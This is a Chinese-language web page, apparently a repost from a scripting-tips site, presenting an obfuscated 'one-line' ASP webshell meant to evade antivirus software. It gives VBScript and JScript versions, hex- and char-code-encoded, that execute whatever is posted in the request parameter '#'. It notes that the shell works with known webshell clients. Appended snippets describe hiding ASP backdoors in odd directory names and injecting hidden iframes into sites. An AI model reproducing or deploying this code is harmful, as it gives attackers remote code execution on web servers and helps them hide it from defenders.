一句话 asp木马加密版 彻底突破杀毒软件_木马相关

不知道怎样表达清楚。看例子吧:

复制代码 代码如下:

<script language=vbs runat=server> 
Execute(HextoStr("65786563757465287265717565737428636872283335292929")) 
Function HextoStr(data) 
HextoStr="EXECUTE """"" 
C="&CHR(&H" 
N=")" 
Do While Len(data)>1 
If IsNumeric(Left(data,1)) Then 
HextoStr=HextoStr&C&Left(data,2)&N 
data=Mid(data,3) 
Else 
HextoStr=HextoStr&C&Left(data,4)&N 
data=Mid(data,5) 
End If 
Loop 
End Function 
</script> 
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt> 

不过加密后就不是一句话了,哈哈。这个s端用海阳或冰狐都可以连得上的,密码是#。

其实只是换写了<script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用<script language=vbs runat=server>那还是一句话,加密主要是为了躲过杀毒软件。

时间: 2024-09-20 05:51:14

一句话 asp木马加密版 彻底突破杀毒软件_木马相关的相关文章

一句话 asp木马加密版 彻底突破杀毒软件

不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&H

隐藏ASP木马后门的两种方法_木马相关

1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

ASP.NET加密口令的方法实例_实用技巧

每当我们要建立数据库驱动的个人化的web站点时,都必须要保护用户的数据.尽管黑客可以盗取个人的口令,然而更严重的问题是有人能够盗走整个数据库,然后立刻就是所有的口令. 原理 有一个好的做法是不将实际的口令存储在数据库中,而是存储它们加密后的版本.当我们需要对用户进行鉴定时,只是对用户的口令再进行加密,然后将它与系统中的加密口令进行比较即可. 在ASP中,我们不得不借助外部对象来加密字符串.而.NET SDK解决了这个问题,它在System.Web.Security名称空间中的FormsAuthe

Asp常见挂马方式大总结_木马相关

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="J

用asp实现的iframe批量替换工具_木马相关

说明: 1.此工具可以批量替换网站上asp,.txt,php,aspx...等等文本型的字符 2.将replace.asp上传至网站根目录后,运行http://网站域名/replace.asp 3.为了安全,使用本程序后请删除或更名 复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%option explicit Response.Buffer=true Response.CharSet=&q

asp 在线备份与恢复sqlserver数据库的代码_数据库相关

asp在线备份sql server数据库: 1.备份sqlserver 复制代码 代码如下: <% SQL="backup database 数据库名 to disk='"&Server.MapPath("backup")&"\"&"backuptext.dat"&"'" set cnn=Server.createobject("adodb.connectio

ASP网站中数据库被挂木马的解决方案_木马相关

本文我们详细介绍了ASP数据库被挂木马的详细解决方案之编程处理的方法,解决方案分为以下三步: 第一步: 为现有数据库做好备份. 第二步: 执行如下ASP文件,这样就可以去掉数据库当中的JS木马: 注:conn.asp自己去写了. '这里放入JS木马内容:请记得改为自己数据库中的JS木马内容. <!--#include file="conn.asp"--> <% Server.ScriptTimeOut=180 Set rstSchema = conn.OpenSche

通过DNS通信绕过杀毒软件进行木马传输

本文讲的是通过DNS通信绕过杀毒软件进行木马传输,在这种技术中,我想通过DNS协议将我的后门木马从攻击者计算机种植在客户端计算机上面,因此在这种情况下,我们需要一个没有硬编码的木马或加密有效的后门代码.因为通过DNS传输,所以被杀毒软件发现的几率特别小. 为什么通过DNS传输不容易被发现呢? 因为在大部分的网络环境中,DNS通信内容不需要被硬件防火墙或者IPS/IDS等防火墙进行监控.我知道您可以使用像Snort IPS/IDS这样的设备检查DNS通信内容,不过在DNS中通过签名来防御新的木马是

用口罩防甲流,用杀毒软件防木马

□记者 王智宇 "用口罩防甲流,用杀毒软件防木马". 6月起,国内杀毒软件的促销季节到来,和往年不同,今年的促销季正遇全球金融危机蔓延,而甲型H1N1流感也给促销带来了些许 "新意".瑞星昨天宣布,凡用户购买"瑞星全功能安全软件2009",便可获赠N95级专业防疫口罩一只.与此同时,金山毒霸也与电影<终结者2018>展开合作,杀毒厂商的促销宣传,正越来越"另类".目前瑞星已经投入大量现金,采用"买软件送N